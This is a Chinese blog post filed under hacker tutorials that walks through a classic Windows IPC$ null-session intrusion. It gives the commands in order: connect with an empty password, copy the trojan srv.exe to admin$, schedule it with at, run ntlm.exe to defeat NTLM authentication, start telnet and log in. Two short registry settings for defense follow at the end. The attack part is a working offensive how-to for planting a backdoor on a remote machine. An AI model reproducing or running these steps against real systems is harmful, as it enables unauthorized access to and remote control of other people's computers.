注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

傲气狂龙

文能起笔安天下,武能马上定乾坤,狂龙一出,谁与争锋。

 
 
 

日志

 
 
关于我

人只有张扬着野性,才不甘于沉沦。野性就是要有梦想,甚至是异想天开。人类就是在异想天开中进步的。

网易考拉推荐

黑客在线之经典入侵技术总结 (一)  

2008-03-21 19:31:10|  分类: 黑客教程 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
简 介
在网入侵中,我总结一下,以下几种常见漏洞入方法和补久措施。By:啤酒盖 相传,在神奇的网络世界中,有一群习惯了昼伏夜出的人,他们崇尚自由,反对收费,不变的信念是共享,在那群人眼中,众生皆平等,也没有什么坚不可破的城墙,他们就是——黑客!今天我们把黑客经常用到的经典入侵技术与大家共享!

一、 永恒的IPC$

  入侵难度:★★★(中等)

  存在范围:★★★(中等)

  危险指数:★★★★★(很高)

  使用几率:★★★★★(很高)

  好用指数:75%

  编辑部评审意见:

  众所周知,安全问题是一个极具时效的问题,就拿两年前百试不爽的.printer溢出和unicode来说吧,在本年度基本上就没怎么再见有还用!

  然而似乎也有例外,针对IPC$问题的攻击就常用常新。

  什么是IPC$漏洞:

  IPC$是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的用户列表。

  我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

  所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行 密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。

  攻击工具:

  扫描软件:流光4.71

  木马软件:srv.exe

  简单攻击:

  1. 打开流光4.71

  2. 进行扫描前的设置

  3. 假设扫出127.0.0.1存在ipc$漏洞,我们进行如下操作

  C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" //这是用流光扫到的密码

  C:\>copy srv.exe $">\\127.0.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有

  出现如下提示:

  c:\winnt\system32\

  已复制 1 个文件

  C:\>net time \\127.0.0.1 //查时间,这里的时间是指对方计算机的,也就是我们要入侵的127.0.0.1的时间,还有要提醒大家要注意的一点是,请把时间转换为24小时制

  C:\>at \\127.0.0.1 11:05 srv.exe //用at命令启动srv.exe

  C:\>net time \\127.0.0.1 //再查查够时间没有

  C:\>telnet 127.0.0.1 99 //我们telnet吧,注意端口是99,因为这里我们用的是srv.exe。

  C:\>copy ntlm.exe $">\\127.0.0.1\admin$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上,在流光的tools目录有

  C:\WINNT\system32>ntlm //运行,破坏对方机器的ntlm验证模式,使我们能通过直接连接对方的telnet模式。

  C:\WINNT\system32>

  C:\WINNT\system32>net start telnet //然后直接用net start telnet启动telnet

  Telnet 服务器正在启动.

  Telnet 服务器已经启动成功。 \ C //成功

  这时我们就可以直接使用TELNET 127.0.0.1连接对方了。

  至此入侵结束。

  如何防御:

  1. 禁止建立空连接

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]

  RestrictAnonymous = DWORD:00000001

  2. 禁止管理共享

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

  AutoShareServer = DWORD:00000000
  评论这张
 
阅读(130)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017